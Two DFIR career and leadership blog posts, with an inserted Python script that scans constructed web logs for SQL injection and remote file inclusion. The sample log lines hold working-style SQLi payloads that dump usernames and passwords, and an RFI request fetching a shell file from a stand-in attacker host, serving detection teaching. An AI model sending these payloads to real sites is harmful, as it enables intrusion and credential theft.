So, I have had more folks ask me about a career in Incident Response and Computer Forensics lately, so I thought I would expound a bit on my original post, How Do I Get There From Here.
I think it's worth mentioning again, that the thing that will propel you in your career, regardless of what that may be, is sheer desire. Getting up every day, and thinking that you are not going to work because you have to, but rather that you get to go work doing something you love, makes a huge difference. I cannot stress that enough...to be a really good investigator, there is no other way.
Something else that I have recently discovered (thanks to some great Detectives) is that a great skill to have is the ability to spot patterns and anomalies. So much of what we do in solving cases begins with finding something that just doesn't look right. You don't have to know exactly what it is, but knowing that something is just off will lead you down the path of taking a deep dive into that "thing", which will either prove or disprove your hypothesis. Then, Sniper Forensics baby, you either use that finding to guide your investigation further, or you step back, formulate a new hypothesis, and drive on. But that initial "hrm...what are you?" moment is something you should experience throughout your investigations.
I spoke about this at a conference once, and I was asked, "How do I learn how to spot anomalies?" Which is a valid question...to which I answered, "By knowing what 'normal' looks like." You need to put in the chair time. You need to know what processes should be running, from where, what is common, and why - basically what makes a normal system look normal. I was a sysadmin for many years before I ever moved into security, which helped me tremendously once I moved into the DFIR world. If you don't have that background, then virtualization is a great thing. Fire up some VMs of different operating systems and just look at them. It sounds boring...but you know...wax on, wax off...
Spotting patterns is a bit different. It requires you to be able to look at data elements and find similarities in them that could be anomalous. The best example I can think of is reviewing web logs for IOCs of SQL Injection or RFI. If you have ever seen these attacks in logs before, you know what I am referring to. You can actually see patterns of the attacker walking the database structure. If he's using an automated tool to do this, you can spot it a mile away - if you scroll through the logs, it looks like a series of shark fins. The same holds true for RFI attacks...you can spot the pattern of the attacker trying to get the system to upload his file. This is also the case for several different kinds of attacks...they have visible patterns that, after you put in some chair time, you can spot. Again, even if you don't know exactly what you're looking at, you know that it's unique when compared to its surroundings.
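As an added illustration of the pattern spotting described above (this is example code written for this page, not something from the original post or from the author's tools), the script below parses a handful of constructed Apache-style log lines, flags request parameters that carry SQL injection or RFI markers, and counts "shark fins" per client. The fin heuristic is my own reading of the sawtooth an automated SQLi tool leaves behind: the request target grows as the tool appends to its payload, then drops back when it starts the next short query. The IPs, paths and payloads are made up, and the regexes are a starting point rather than a complete signature set.

```python
"""Spotting SQLi / RFI patterns in web server logs (added example, constructed data)."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample, Apache combined format. The first client walks the database
# (column count, then tables, then columns, then rows); the second tries an RFI;
# the third is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2012:10:00:01 -0600] "GET /products.php?id=5 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:02 -0600] "GET /products.php?id=5%20UNION%20SELECT%20NULL HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:03 -0600] "GET /products.php?id=5%20UNION%20SELECT%20NULL%2CNULL HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:04 -0600] "GET /products.php?id=5%20UNION%20SELECT%20NULL%2CNULL%2CNULL HTTP/1.1" 200 4830 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:05 -0600] "GET /products.php?id=5%20AND%201%3D1 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:06 -0600] "GET /products.php?id=5%20UNION%20SELECT%20table_name%2CNULL%2CNULL%20FROM%20information_schema.tables HTTP/1.1" 200 5102 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:07 -0600] "GET /products.php?id=5%20UNION%20SELECT%20column_name%2CNULL%2CNULL%20FROM%20information_schema.columns%20WHERE%20table_name%3D%27users%27 HTTP/1.1" 200 5230 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:08 -0600] "GET /products.php?id=5%20UNION%20SELECT%20username%2Cpassword%2CNULL%20FROM%20users%20LIMIT%200%2C1 HTTP/1.1" 200 4912 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:09 -0600] "GET /products.php?id=5%20UNION%20SELECT%20CONCAT%28username%2C0x3a%2Cpassword%29%2CNULL%2CNULL%20FROM%20users%20LIMIT%200%2C1 HTTP/1.1" 200 4940 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:10 -0600] "GET /products.php?id=5%20UNION%20SELECT%20GROUP_CONCAT%28username%2C0x3a%2Cpassword%20SEPARATOR%200x0a%29%2CNULL%2CNULL%20FROM%20users HTTP/1.1" 200 6201 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2012:10:00:11 -0600] "GET /products.php?id=5 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Dec/2012:10:05:00 -0600] "GET /index.php?page=http://evil.example/shell.txt%3F HTTP/1.1" 200 3310 "-" "curl/7.21"
192.0.2.44 - - [12/Dec/2012:10:06:00 -0600] "GET /index.php?page=about HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Markers of someone walking the database: UNION SELECT, the schema catalog,
# boolean tautologies, comment terminators, time-based probes.
SQLI = re.compile(
    r"(?i)(\bunion\b.{0,40}\bselect\b|information_schema|\b(?:or|and)\b\s+\d+\s*=\s*\d+"
    r"|'\s*(?:--|#)|\bsleep\s*\(|\bbenchmark\s*\()"
)
# RFI: a parameter value that is itself an absolute URL to another host.
RFI = re.compile(r"(?i)^(?:https?|ftp)://")


def parse(line):
    """Split one combined-format line into fields and decoded query parameters."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl decodes once; decode again because attackers double-encode
    # to slip past naive filters.
    rec["params"] = [(k, unquote_plus(v))
                     for k, v in parse_qsl(url.query, keep_blank_values=True)]
    return rec


def classify(rec):
    """Return the set of attack tags ('sqli', 'rfi') whose markers appear in any parameter."""
    tags = set()
    for _key, val in rec["params"]:
        if SQLI.search(val):
            tags.add("sqli")
        if RFI.match(val.strip()):
            tags.add("rfi")
    return tags


def fin_count(lengths, min_run=3):
    """Count shark fins: runs of at least min_run strictly growing request-target
    lengths that end in a drop. A single ramp with no drop after it is not counted."""
    fins, run = 0, 1
    for prev, cur in zip(lengths, lengths[1:]):
        if cur > prev:
            run += 1
        else:
            if run >= min_run:
                fins += 1
            run = 1
    return fins


def analyze(log_text):
    """Return (findings, fins): tagged requests, and shark-fin count per client IP."""
    by_ip = defaultdict(list)
    findings = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        by_ip[rec["ip"]].append(len(rec["target"]))
        tags = classify(rec)
        if tags:
            findings.append((rec["ip"], rec["path"], sorted(tags)))
    fins = {ip: fin_count(lens) for ip, lens in by_ip.items()}
    return findings, fins


if __name__ == "__main__":
    found, fins = analyze(SAMPLE_LOG)
    for ip, path, tags in found:
        print(f"{ip:14} {path:15} {','.join(tags)}")
    for ip, n in fins.items():
        print(f"{ip:14} shark fins: {n}")
```

The regex hit is only the "hrm...what are you?" moment; the value is in what you do next. Pull every request from that client in time order and you see the walk itself: column-count probing, then information_schema, then the users table, which is the hypothesis-driven deep dive the post describes. The fin count is deliberately crude (it ignores timing and status codes), and real tools vary their padding, so treat it as a prompt to go look, not as a verdict.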
OK Chris...that's all well and good in theory, but that does not help me find a DFIR job. Do you have any recommendations that will help me actually get in the door? Great question...and Yes...yes I do.
OK...a bit of history...when I was a sysadmin at American Express in Phoenix, I used to admin both Windows and *nix servers (Solaris, AIX, and Linux). It was pretty cool, but kind of boring as it didn't present anything in the way of challenges (at least for me...no offence to sysadmins...that's my roots!). So, I started looking into this whole security thing (this was about 2001). Pentest looked kewl to me. I knew how to make stuff work...let's see if I can learn how to break into those same systems. Since I didn't actually have a security job, I couldn't actually DO anything security related at work. So, I bought a copy of VMware, and started playing with tools. What was Metasploit and what did it do? What is ARP spoofing...can I do that at home? Basic research in my home lab. So, when I finally found an opening and got an interview, I was able to tell the hiring manager that all I had was what I found in the open source community and my home lab, but that I practiced and researched at home. I read books, blogs, and whitepapers trying to get as much knowledge as I could without actually doing the job. Well, I got the job for that very reason.
All of that to say...do that. If you want a job in DFIR and you are not currently working in DFIR, then research in your home lab. Take images of your systems, your iPod, your buddies' laptops...whatever, and start to play with the tools of the trade. Learn how to mount images, create timelines, parse data on the command line, learn how to use grep, gawk, and cut, use RegRipper to inspect registry hives...etc. Knowing which tool to use, when, and why is critical! Remember, I rarely ever use commercial forensics tools. You can conduct comprehensive investigations without ever spending a dime!
So, when somebody interviews you, and you tell them, "I don't do this for a living, but I want to, and here is what I am doing to prepare myself for that," that should speak volumes about the type of employee you would be. I know for me, you would certainly shoot to the top of my list.
I hope that helps clarify things a bit for those of you that are seeking careers in DFIR. If there is something you would like me to expand on, please let me know! Or, if there is something I mentioned that you would like me to dig deeper into, please let me know. I am more than happy to help! After all, I may be interviewing you someday. It would be great to hear that you read my blog posts and so you did X.
Best of luck to you!
Wednesday, December 12, 2012
True to form, I am sitting in the airport in Tulsa headed to Seattle for Blue Hat, and writing another blog post. A lot has gone on over the past couple of months, so let me bring you up to speed and make a bit of an "announcement".
First, and most important (as it sets the stage for my "announcement"), I was recently promoted from Managing Consultant of the US DFIR team to Director of the DFIR practice at Trustwave. I had a great boss in Colin Sheppard who was preparing me for the role, and once he left Trustwave, he opened the door and made the recommendation for me to take on his role. I am truly excited about the opportunity and look forward to the new challenges it brings.
So, that brings me to my "announcement"...I will no longer be posting strictly technical content to The Digital Standard. I have truly enjoyed blogging about my work over the past few years and have even had the pleasure of meeting some of my readers. However, since my role has changed significantly, and I won't be working many cases going forward, I simply won't have the content to be able to write as many technical posts as I think would actually be worth reading.
Now, part two of the announcement is that I will be changing the focus of The Digital Standard from in-the-trenches DFIR work to DFIR leadership and security management. Some of you may or may not know, but before I ever became technical, I was a business manager. I actually have my Bachelor's degree in Business Management. Additionally, I attended the US Army Warrant Officer Academy. As those of you who have attended military officer-producing schools know, there is a heavy focus on situational leadership (AKA being skull drug) - a skill you either develop or you wash out (for the most part). That is all to say, I actually have some experience in leadership, and feel that I have something of value to share.
Like all of my previous posts, I will intentionally be leaving out certain pieces of information. Not only do I have NDAs to adhere to, but I have to respect the anonymity of the people I am working with and that work with me.
For those of you that continue to read my sporadic posts, I hope you find value in my writing. Working in the DFIR community presents some of the most unique leadership challenges anywhere in the professional world. We joke with our clients, but it's so true: "Your worst day is my every day." Living in someone else's nightmare certainly helps to hone your leadership and problem solving skills!
Also, if there is something that you would like me to research and/or write about, please let me know.
Also, also - I am hopeful that my new position will permit me the time to do something I have been wanting to do for a couple of years now, write a Sniper Forensics book! No promises, but it's high on the "To Do" list for 2013. I have wanted to do it for many years, and due to the amount of case work I have been doing, I simply did not have the time. Now that I am not actively working cases, I may actually be able to write for a couple of hours every day. If any of you have any topics you FOR SURE would like to see covered in the book, please let me know. I am writing it for you all...I have the information in my head already. It wouldn't do me any good to write on something I think should be in there, if there are other things that you as the reader (and purchaser) of the book would prefer to see.
Here is where I normally say, "Happy Hunting"....but considering the circumstances, I will have to work on something else to end my posts with...hrmmmmmmmm